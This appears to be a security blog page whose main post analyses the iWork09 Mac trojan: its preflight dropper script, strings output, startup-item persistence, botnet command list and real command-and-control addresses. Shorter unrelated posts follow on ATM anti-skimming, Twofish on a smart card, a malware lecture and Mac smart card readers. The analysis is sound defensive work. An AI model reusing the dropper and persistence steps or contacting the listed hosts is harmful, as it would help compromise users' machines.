iWork/CS4 Trojan In-Depth Analysis
Last week’s Intego trojan alert caught quite a bit of attention in the Mac community and was captured on probably every IT-News site around the world. As this might be the first really serious trojan to threat Mac OS X users, let’s go and try to analyze it.
First, this is a Universal Binary, so it affects Macs both running on Intel- and PowerPC processors.
The SHA-1 fingerprint of iworkservices is 55d754b95ab9b34bdd848300045c3e11caf67ecf.
The iWork09 package is basically a repackaged version of the iWork09 Trial download from apple.com with a serial to unlock it included. To add their trojan/backdoor to the package, they had to do some work first.
What you see is the content of the iWork09Trial.mpkg install package. Both Info.plist and iWorkTrial.dist control the behaviour of the installation process of the whole package. Sub-packages are listed here.
from the Info.plist
from the iWorkTrial.dist
Now, the iWorkServices.pkg install package contains the usual files created by Apple’s Package Maker, a pretty nifty, straightforward and GUI-based tool for creating installation packages for Mac OS X*.
*Available from within the Developer Tools.
The interesting files here are preflight, a script which is executed by the installer prior to the actual program install, and iworkservices, which is the trojan itself.
#!/bin/sh
"$1/Contents/Resources/iworkservices" &
The preflight script simply executes the trojan in a shell, where $1 is just a placeholder for the on-disk path to the install package.
Now comes the interesting part. Running otool revealed that it’s not an Objective-C, but a C/C++ program. Furthermore, running strings on iworkservices yields some details of the trojan’s behaviour.
__dyld_make_delayed_module_initializer_calls
__dyld_mod_term_funcs
/usr/lib/libSystem.B.dylib
__cxa_atexit
__cxa_finalize
atexit
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices
cp %s %s
/System/Library/StartupItems/iWorkServices/StartupParameters.plist
/System/Library/StartupItems/iWorkServices/iWorkServices
chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices
Description = "iWorkServices";
Provides = ("iWorkServices");
Requires = ("Network");
OrderPreference = "None";
#!/bin/sh
/usr/bin/iWorkServices &
iWorkServices
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
PANIC: unprotected error in call to Lua API (%s)
[...]
excerpt from the output of strings, see full output here
As you can see, it first copies itself to /System/Library/StartupItems/iWorkServices and /usr/bin/iWorkServices, creates a StartupParameters.plist configuration file, sets rwxr-xr-x permissions on the executeable and finally runs itself from within /usr/bin/iWorkServices. Note the Requires = (”Network”); line in the configuration file which means the Startup Item will be launched by launchd when network connection is available.
As some people already found out, this trojan is actually a bot program. The commands which your bot may receive from the master server are listed below.
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
p2pnodes
So this looks like it’s a Peer-to-Peer botnet. When started, it connects to the master server(s) serving at 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024 using HTTP and downloads a list of all other p2p nodes to /tmp/.iWorkServices.
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
Right after that it’ll go to sleep until it receives commands from the master server.
What’s also interesting is the mentioning of the Lua API.
PANIC: unprotected error in call to Lua API (%s)
Lua is powerful but yet small embeddable scripting language. It seems the bad guys are making their life easier, too.
Disassembling the whole trojan gave about 43,000 lines of code, but this probably includes the Lua API set. If someone has left some spare time, grab the code here.
According to Intego, as of 22., Jan 20,000 people already downloaded this pirated copy. So we have a botnet of 20,000+ Macs supposedly already running DDOS attacks against some sites using a PHP script.
If anyone is investigating this botnet a little further, please let me know.
Thanks go to Methusela Cebrian Ferrer from iThreats for the initial sight into the trojan.
Banken wehren sich gegen Skimming-Angriffe
Posted by: cordney* in security, technology on October 1st, 2008
Überrascht, nein - besser überrumpelt, stand ich letzte Woche vor dem Geldautomaten meiner Bank. Denn vor dem Kartenlesegerät des Automaten war ein zusätzliches Gerät angebracht mit einem grünen Schloss-Symbol darauf (Bild s.u.).
Aufgrund der vielen Manipulationen an Geldautomaten in letzter Zeit ist man natürlich vorsichtig geworden, also holte ich die Karte wieder aus dem Automaten und rief meine Bank an. Nach kurzer Nachfrage bei einer anderen Abteilung gab man mir dann Entwarnung. Das Gerät sei eine zusätzliche Sicherheitsmaßnahme, die weiteren Manipulationen vorbeugen soll. Man bedankte sich aber dafür, dass ich mich gemeldet habe. Man versprach auch einen Aushang zu machen, damit andere Kunden darüber informiert sind.
Nach weiteren Recherchen entpuppte sich das Gerät als “Anti-Skimming Modul”, ein Gerät, dass Manipulationen erkennen kann und dann entsprechend reagiert.
Wie das Ganze funktionieren soll, will man jedoch nicht sagen. Geheimniskrämerei wenn’s um Sicherheit geht - da war doch was. Sollte jemand Insiderwissen haben, immer her damit! Werde bei Gelegenheit nochmal meine Professoren dazu befragen. Mittlerweile aber suchen sich die Betrüger einen anderen Weg um die Karten zu kopieren. Sie manipulieren einfach andere Lesegeräte - nämlich die Lesegeräte für die Zugangskontrolle am Eingang zur Filiale. Auch darauf reagierten die meisten Banken - und montierten diese Lesegeräte gleich komplett ab.
Bleibt abzuwarten ob die Bemühungen der Banken fruchten.
We made third! or Twofish on a smart card
In a practical course this summer term the task was to implement the twofish block-cipher, a former AES candidate, on an embedded device, a smart card with an ATMega163 microcontroller on board. A prize was promised for the team that has the best performance based on clock cycles per key schedule/encryption/decryption and code size. 3 weeks of time were given, 10 teams participated and we made third, yeah!
In particular, the main decision was to handle the S-Boxes. The S-Box keys are derived from the main key and can be precomputed. So the main questions was whether we save clock cycles and precompute them or compute them on-the-fly while running enrcyption/decryption and save SRAM in the microcontroller. We decided to precompute them, as this would bring our implementation a significant performance increase.
These are the statistics..
Im Westen nichts neues..
..aber interessante Zahlen! So könnte man den heutigen HGI-Vortrag zusammenfassen. Zu Gast war der Chef der Security Labs der G DATA Software AG, einem in Bochum beheimateten IT-Sicherheits Softwarehaus, das für Privat- und Geschäftskunden u.a. Anti-Viren Software anbietet.
Das Thema des Vortrags “Schadcode im Internet” wurde zu Beginn gleich in “Schadcode in Webseiten” umbenannt, denn darum ging es im Vortrag eigentlich. Begonnen wurde zugleich mit den beiden aktuell am weitesten verbreiteten Infektionsmethoden: Direct Downloads und Drive-by-Downloads. Das ist für Sicherheitsspezialisten sicher nichts Neues, wenn man jedoch bedenkt, dass noch vor einem Jahr der bekannteste Weg der Infektion verseuchte E-Mail Anhänge waren, die jetzt so gut wie nicht mehr auftreten, sieht man die Weiterentwicklung der Schutztechniken in E-Mail Programmen nun deutlich. Die Angreifer haben sich ein leichteres Angriffsziel gesucht: Den Browser.
Nun aber zu den interessanten Zahlen (ca-Werte):
- 10-12 Mio. Bots sind weltweit aktiv
- 30.000 neue Bots kommen täglich hinzu
- über 80% des Spams kommt von etwa 200 Organisationen
- 10.000 Webseiten-Defacements pro Tag
- 3000 DDoS-Angriffe pro Tag! (seit Anfang des Jahres stetig steigend)
Insgesamt ein recht interessanter Vortrag, wenn auch etwas zu wenig detailliert, aber mit Malware kann man auch Abende füllen!
Smart Card Readers for Mac OS X
Getting non-standard hardware to work is not that easy. The first thing you’ll do is searching the internet for devices reported to work flawlessly with Mac OS X. This came up on me when looking for compatible Smart Card Readers. This is just an example for this “finding the needle in the haystack”. Normally, also Apple provides no hints on working devices. But for Smart Card Readers I accidentally found a note in an Apple document which lists compatible readers for Mac OS X. I hope this blogpost lists up #1 on Google soon.
Compatible Smart Card Readers:
Mac OS X Tiger includes built-in support for many types of smart card readers.
Compatible smart card readers include:
* Any certified Chip Card Interface Device (CCID) USB class reader
* USB readers such as Athena, CryptoCard, GemPlus, and SCM
* PC Card readers such as CryptoCard, SCM, and OmniKey
* USB dongle readers such as OmniKey and GemPlus
Source: Apple Smart Card Setup Guide
Tags: smartcard, apple, usb reader, reader, compatible